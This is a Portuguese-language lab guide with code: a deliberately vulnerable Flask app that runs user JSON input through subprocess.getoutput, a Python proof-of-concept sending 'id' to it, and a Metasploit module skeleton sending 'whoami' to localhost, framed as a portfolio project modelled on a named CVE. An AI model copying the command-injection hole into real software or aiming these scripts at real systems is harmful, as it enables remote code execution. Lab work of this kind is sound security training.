
Abaixo está o plano completo do LAB: aplicação demo-vulnerável → PoC em Python → esqueleto de exploit do Metasploit
Criamos uma lógica semelhante ao CVE-2025-55182 (execução insegura no lado do servidor).
📁 vuln_app/app.py
from flask import Flask, request
import subprocess
app = Flask(__name__)
@app.route("/render", methods=["POST"])
def render():
data = request.json.get("component")
# ❌ VULNERABLE: user input to command execution
result = subprocess.getoutput(data)
return result
if __name__ == "__main__":
app.run(host="0.0.0.0", port=3000)
Executar:
pip install flask
python app.py
entrada do lado do servidor → execução
Isto é apenas para provar a existência do RCE.
📁 poc.py
import requests
url = "http://127.0.0.1:3000/render"
payload = {
"component": "id"
}
r = requests.post(url, json=payload)
print("[+] Server response:")
print(r.text)
Se a saída for:
uid=1000(user) gid=1000(user)
✅ RCE CONFIRMADO (LAB)
Este é um formato profissional de framework, mas não é weaponized.
📁 Localização
~/.msf4/modules/exploits/linux/http/lab_react_like_rce.rb
📄 lab_react_like_rce.rb
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'LAB React-like Server RCE',
'Description' => %q{
Demonstration exploit for unsafe server-side execution.
Tested only in a controlled lab environment.
},
'Author' => ['Behruz'],
'License' => MSF_LICENSE,
'Platform' => ['linux'],
'Arch' => ARCH_CMD,
'Targets' => [['Automatic', {}]],
'DisclosureDate' => '2025-01-01',
'DefaultTarget' => 0
))
register_options([
OptString.new('TARGETURI', [true, 'Vulnerable endpoint', '/render'])
])
end
def exploit
print_status("Sending lab command execution request")
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'ctype' => 'application/json',
'data' => {
'component' => 'whoami'
}.to_json
})
print_good("Request sent (LAB validation only)")
end
end
Utilização:
msfconsole
use exploit/linux/http/lab_react_like_rce
set RHOSTS 127.0.0.1
run
📌 Aqui:
❌ não há reverse shell
✅ há conhecimento de framework + lógica de exploit
No GitHub deve ficar assim:
lab-react-like-rce/
├─ vuln_app/
│ └─ app.py
├─ poc/
│ └─ poc.py
├─ metasploit/
│ └─ lab_react_like_rce.rb
├─ README.md
## Description
This project demonstrates a lab-based server-side code execution
vulnerability inspired by modern RCE CVEs.
## Scope
- Tested only in a controlled lab environment
- No real-world systems were targeted
## Skills Demonstrated
- Vulnerability analysis
- Python PoC development
- Custom Metasploit module creation